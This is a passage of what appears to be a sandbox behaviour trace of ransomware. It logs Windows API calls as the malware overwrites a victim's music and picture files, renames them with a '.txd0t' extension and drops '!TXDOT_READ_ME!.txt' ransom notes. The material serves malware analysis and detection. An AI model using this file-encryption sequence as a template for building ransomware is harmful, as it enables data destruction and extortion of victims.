hFile=0x47c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=18740) returned 1 [0075.108] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.108] WriteFile (in: hFile=0x47c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0075.109] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffb4cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.110] ReadFile (in: hFile=0x47c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x4930, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x4930, lpOverlapped=0x0) returned 1 [0075.110] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffb6d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.110] WriteFile (in: hFile=0x47c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x4930, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x4930, lpOverlapped=0x0) returned 1 [0075.110] FlushFileBuffers (hFile=0x47c) returned 1 [0075.133] GetProcessHeap () returned 0xe30000 [0075.133] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed1a20 [0075.134] StrCpyW (in: psz1=0xed1a20, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a" [0075.134] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a") returned="WDCK.m4a" [0075.134] StrCpyW (in: psz1=0xed1a7a, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.134] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\!TXDOT_READ_ME!.txt") returned 1 [0075.134] GetProcessHeap () returned 0xe30000 [0075.134] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1a20 | out: hHeap=0xe30000) returned 1 [0075.134] CloseHandle (hObject=0x47c) returned 1 [0075.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\wdck.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\wdck.m4a.txd0t")) returned 1 [0075.141] SetEvent (hEvent=0x40c) returned 1 [0075.141] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0075.148] StrCpyW (in: psz1=0x4a9f720, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3" [0075.148] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3.txd0t" [0075.148] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3.txd0t") returned 0 [0075.148] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3", dwFileAttributes=0x80) returned 1 [0075.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\7k19qhzkq\\umilh6.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0075.149] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=19683) returned 1 [0075.149] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.149] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0075.150] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffffb11d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.150] ReadFile (in: hFile=0x464, lpBuffer=0x415b020, nNumberOfBytesToRead=0x4ce0, lpNumberOfBytesRead=0x4a9f6e0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6e0*=0x4ce0, lpOverlapped=0x0) returned 1 [0075.150] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffffb320, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.151] WriteFile (in: hFile=0x464, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x4ce0, lpNumberOfBytesWritten=0x4a9f6e4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6e4*=0x4ce0, lpOverlapped=0x0) returned 1 [0075.151] FlushFileBuffers (hFile=0x464) returned 1 [0075.168] GetProcessHeap () returned 0xe30000 [0075.168] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x12a) returned 0xe9b648 [0075.168] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3" [0075.168] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3") returned="UMILH6.mp3" [0075.168] StrCpyW (in: psz1=0xe9b6b6, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.168] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\!TXDOT_READ_ME!.txt") returned 0 [0075.168] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\7k19qhzkq\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0075.171] WriteFile (in: hFile=0x478, lpBuffer=0x4a9f714*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x4a9f714*, lpNumberOfBytesWritten=0x4a9f710*=0x2, lpOverlapped=0x0) returned 1 [0075.172] FlushFileBuffers (hFile=0x478) returned 1 [0075.307] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f710*=0x7f0, lpOverlapped=0x0) returned 1 [0075.307] FlushFileBuffers (hFile=0x478) returned 1 [0075.452] CloseHandle (hObject=0x478) returned 1 [0075.453] GetProcessHeap () returned 0xe30000 [0075.453] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0075.453] CloseHandle (hObject=0x464) returned 1 [0075.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\7k19qhzkq\\umilh6.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\7k19qhzkq\\umilh6.mp3.txd0t")) returned 1 [0075.455] SetEvent (hEvent=0x40c) returned 1 [0075.455] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0075.461] StrCpyW (in: psz1=0x4a9f700, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav" [0075.461] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav.txd0t" [0075.461] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav.txd0t") returned 0 [0075.461] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav", dwFileAttributes=0x80) returned 1 [0075.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\tos-ewe0vccwoskwd1\\uucd01dt4yfqz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0075.462] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=25975) returned 1 [0075.462] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.462] WriteFile (in: hFile=0x468, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0075.463] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff9889, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.463] ReadFile (in: hFile=0x468, lpBuffer=0x415b020, nNumberOfBytesToRead=0x6570, lpNumberOfBytesRead=0x4a9f6c0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6c0*=0x6570, lpOverlapped=0x0) returned 1 [0075.464] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff9a90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.464] WriteFile (in: hFile=0x468, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x6570, lpNumberOfBytesWritten=0x4a9f6c4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6c4*=0x6570, lpOverlapped=0x0) returned 1 [0075.464] FlushFileBuffers (hFile=0x468) returned 1 [0075.787] GetProcessHeap () returned 0xe30000 [0075.787] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x14a) returned 0xeca148 [0075.787] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav" [0075.787] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav") returned="uUCd01DT4yfQz.wav" [0075.787] StrCpyW (in: psz1=0xeca1c8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.788] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\!TXDOT_READ_ME!.txt") returned 1 [0075.840] GetProcessHeap () returned 0xe30000 [0075.840] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0075.841] CloseHandle (hObject=0x468) returned 1 [0075.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\tos-ewe0vccwoskwd1\\uucd01dt4yfqz.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\tos-ewe0vccwoskwd1\\uucd01dt4yfqz.wav.txd0t")) returned 1 [0075.872] SetEvent (hEvent=0x40c) returned 1 [0075.872] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0075.882] StrCpyW (in: psz1=0x4a9f760, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png" [0075.882] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png.txd0t" [0075.882] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png.txd0t") returned 0 [0075.882] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png", dwFileAttributes=0x80) returned 1 [0075.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f1oee.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0075.882] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=7501) returned 1 [0075.882] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.882] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0075.883] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffffe0b3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.883] ReadFile (in: hFile=0x464, lpBuffer=0x415b020, nNumberOfBytesToRead=0x1d40, lpNumberOfBytesRead=0x4a9f720, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f720*=0x1d40, lpOverlapped=0x0) returned 1 [0075.883] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffffe2c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.883] WriteFile (in: hFile=0x464, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x1d40, lpNumberOfBytesWritten=0x4a9f724, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f724*=0x1d40, lpOverlapped=0x0) returned 1 [0075.883] FlushFileBuffers (hFile=0x464) returned 1 [0076.120] GetProcessHeap () returned 0xe30000 [0076.120] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf4) returned 0xe9d750 [0076.120] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png" [0076.120] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png") returned="F1oeE.png" [0076.120] StrCpyW (in: psz1=0xe9d78a, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.120] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0076.121] GetProcessHeap () returned 0xe30000 [0076.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0076.121] CloseHandle (hObject=0x464) returned 1 [0076.121] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f1oee.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\F1oeE.png.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\f1oee.png.txd0t")) returned 1 [0076.122] SetEvent (hEvent=0x40c) returned 1 [0076.122] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0076.124] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp" [0076.124] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp.txd0t" [0076.124] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp.txd0t") returned 0 [0076.124] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp", dwFileAttributes=0x80) returned 1 [0076.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\0 jxvleh5y.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0076.124] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=52913) returned 1 [0076.124] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.124] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0076.125] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff2f4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.125] ReadFile (in: hFile=0x464, lpBuffer=0x415b020, nNumberOfBytesToRead=0xceb0, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0xceb0, lpOverlapped=0x0) returned 1 [0076.126] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff3150, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.126] WriteFile (in: hFile=0x464, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xceb0, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0xceb0, lpOverlapped=0x0) returned 1 [0076.127] FlushFileBuffers (hFile=0x464) returned 1 [0076.143] GetProcessHeap () returned 0xe30000 [0076.143] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed1b48 [0076.143] StrCpyW (in: psz1=0xed1b48, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp" [0076.143] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp") returned="0 jXVleh5y.bmp" [0076.143] StrCpyW (in: psz1=0xed1b96, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.143] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.148] GetProcessHeap () returned 0xe30000 [0076.148] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1b48 | out: hHeap=0xe30000) returned 1 [0076.148] CloseHandle (hObject=0x464) returned 1 [0076.150] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\0 jxvleh5y.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\0 jxvleh5y.bmp.txd0t")) returned 1 [0076.150] SetEvent (hEvent=0x40c) returned 1 [0076.150] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0076.157] StrCpyW (in: psz1=0x4a9f730, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif" [0076.157] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif.txd0t" [0076.157] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif.txd0t") returned 0 [0076.158] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif", dwFileAttributes=0x80) returned 1 [0076.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\bwuccmwgbf1mcn_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0076.158] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=98463) returned 1 [0076.158] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.158] WriteFile (in: hFile=0x474, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0076.159] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe7d61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.159] ReadFile (in: hFile=0x474, lpBuffer=0x415b020, nNumberOfBytesToRead=0x18090, lpNumberOfBytesRead=0x4a9f6f0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6f0*=0x18090, lpOverlapped=0x0) returned 1 [0076.161] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe7f70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 